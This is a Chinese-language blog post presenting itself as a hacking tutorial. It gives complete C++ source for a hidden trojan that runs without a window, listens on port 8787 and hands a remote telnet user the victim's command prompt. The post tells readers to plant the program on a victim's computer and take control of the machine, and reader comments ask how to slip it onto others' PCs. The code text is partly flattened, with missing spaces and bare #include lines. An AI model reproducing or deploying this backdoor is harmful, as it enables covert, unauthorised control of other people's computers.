一隻精簡的C++木馬 - 歐維斯福利設

如上圖，那個「IPv4位址」就是IP(此範例是192.168.43.138)，就緒後，在你的電腦打「telnet 對方IP Port」Port是你在程式碼中宣告的端口號(我用8787)，如果沒有telnet的話( ... facebook Email 歐維斯福利設 AlwaysSecurityBlog 木馬程式病毒程式設計駭客教學C語言C語言病毒C語言範例Windows 一隻精簡的C++木馬 by LBT -晚上11:49        這邊跟各位介紹一個很簡單的木馬，能用來操控遠端電腦的命令提示字元，雖然說簡單，不過有用到一些較進階的函式庫和進階的記憶體技巧。

這隻馬用VC編譯後就會產生一個執行黨，執行時無任何視窗顯示，接下來，參考這篇文章:【C++】如何發行VC程式?  並根據此文打包好木馬後，將馬放到要害的人的電腦上，並執行，接著找到他的IP。

我提供一種辦法來尋找IP，在被害人的電腦上開啟CMD，並輸入ipconfig: 如上圖，那個「IPv4位址」就是IP(此範例是192.168.43.138)，就緒後，在你的電腦打「telnet對方IPPort」Port是你在程式碼中宣告的端口號(我用8787)，如果沒有telnet的話(出現「'telnet'不是內部或外部命令、可執行的程式或批次檔。

」)，請到控制台->程式集->程式和功能: 點「開啟或關閉Windows功能」並把「Telnet用戶端勾選起來」: 按下確定即可。

       連上之後，你就可以輸入CMD命令了，幾乎可以控制對方整台電腦，不會CMD的讀者，請參考這篇文章:最詳盡的CMD命令大全  好啦，程式碼就貼出來: //horse.cpp:定義主控台應用程式的進入點。

// #include"stdafx.h" #pragmacomment(lib,"ws2_32.lib") #pragmacomment(linker,"/subsystem:\"windows\"/entry:\"mainCRTStartup\"") #include #include #defineMasterPort8787//宣告端口 intmain(intargc,char*argv[]) { WSADATAWSADa; sockaddr_inSockAddrIn; SOCKETCSocket,SSocket; intiAddrSize; PROCESS_INFORMATIONProcessInfo; STARTUPINFOStartupInfo; LPWSTRszCMDPath=newTCHAR[256]; ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION)); ZeroMemory(&StartupInfo,sizeof(STARTUPINFO)); ZeroMemory(&WSADa,sizeof(WSADATA)); GetEnvironmentVariable(L"COMSPEC",szCMDPath,256);//取得CMD位址 WSAStartup(0x0202,&WSADa); SockAddrIn.sin_family=AF_INET; SockAddrIn.sin_addr.s_addr=INADDR_ANY; SockAddrIn.sin_port=htons(MasterPort); CSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0); bind(CSocket,(sockaddr*)&SockAddrIn,sizeof(SockAddrIn)); listen(CSocket,5); iAddrSize=sizeof(SockAddrIn); while((SSocket=accept(CSocket,(sockaddr*)&SockAddrIn,&iAddrSize))){ StartupInfo.cb=sizeof(STARTUPINFO); StartupInfo.wShowWindow=SW_HIDE; StartupInfo.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW; StartupInfo.hStdInput=(HANDLE)SSocket; StartupInfo.hStdOutput=(HANDLE)SSocket; StartupInfo.hStdError=(HANDLE)SSocket; CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);//執行cmd WaitForSingleObject(ProcessInfo.hProcess,INFINITE);//等待執行敘結束 CloseHandle(ProcessInfo.hProcess); CloseHandle(ProcessInfo.hThread); closesocket(SSocket); } closesocket(CSocket); WSACleanup(); return0; } 如果有任何問題可以到粉專發問喔! Share Tweet Share Tags: 木馬程式, 病毒, 程式設計, 駭客教學, C語言, C語言病毒, C語言範例, Windows 較新的文章 較舊的文章 你可能會喜歡 3 意見 Alan2020年4月17日清晨6:14請問一下這跟資料如何直入到別人電腦中呢?回覆刪除回覆回覆Unknown2020年10月2日晚上11:39请问port是输入对方的吗？回覆刪除回覆回覆Unknown2020年10月2日晚上11:40我的电脑是英文版，指令一样输入华文吗？回覆刪除回覆回覆新增留言載入更多… 較新的文章 較舊的文章 FACEBOOK 歐維斯福利社 熱門文章 【Windows全攻略】各版本WindowsISO下載 【超狂】微軟各產品KMS序號大全!!! 【c++範例】輸出、入變數的值 【電腦秘笈】如何下載YouTube的影片?只需兩個步驟!!!(不用安裝軟體) 即便電腦未連上網，駭客依然能竊取資訊? 標籤 C語言範例 C++ C++範例 駭客教學 電腦秘笈 Windows Windows高手秘笈 資安Q&A 病毒 C語言 程式設計 免費軟體 新鮮事 木馬程式 C語言病毒 Python SQL 檔案下載 硬體 Tor 序號大全 沙盒 測試樣本 登錄檔操作 GTA5 信息蒐集 外掛 底層 影音相關軟體 遊戲 開站以來瀏覽量 文章存檔 七月2019(1) 五月2019(1) 十二月2018(3) 八月2018(2) 七月2018(1) 六月2018(1) 四月2018(3) 三月2018(4) 二月2018(2) 十二月2017(2) 十一月2017(4) 十月2017(3) 九月2017(18) 八月2017(28) 七月2017(7) 六月2017(3) 五月2017(3)